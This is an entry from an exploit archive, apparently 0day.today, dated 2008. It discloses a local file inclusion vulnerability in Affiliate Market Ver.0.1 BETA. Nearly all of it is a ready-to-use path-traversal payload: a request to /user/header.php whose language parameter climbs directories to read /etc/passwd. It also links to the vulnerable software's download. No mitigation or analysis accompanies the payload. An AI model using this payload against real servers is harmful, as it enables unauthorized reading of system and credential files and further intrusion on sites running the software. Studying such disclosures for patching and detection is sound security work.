id: 2631
date: 02/13/2008
title: Affiliate Market Ver.0.1 BETA (language) Local File Inclusion Vulnerability
author: GoLd_M
cves: 

===========================================================================
Affiliate Market Ver.0.1 BETA (language) Local File Inclusion Vulnerability
===========================================================================



Affiliate Market Ver.0.1 BETA (language) Local File Include Vulnerability
http://kent.dl.sourceforge.net/sourceforge/affmarket/affmarket.30.03.07.zip
/user/header.php?language=../../../../../../../../../../../etc/passwd
I'm tryagi ..^|-



#  0day.today [2023-03-24]  #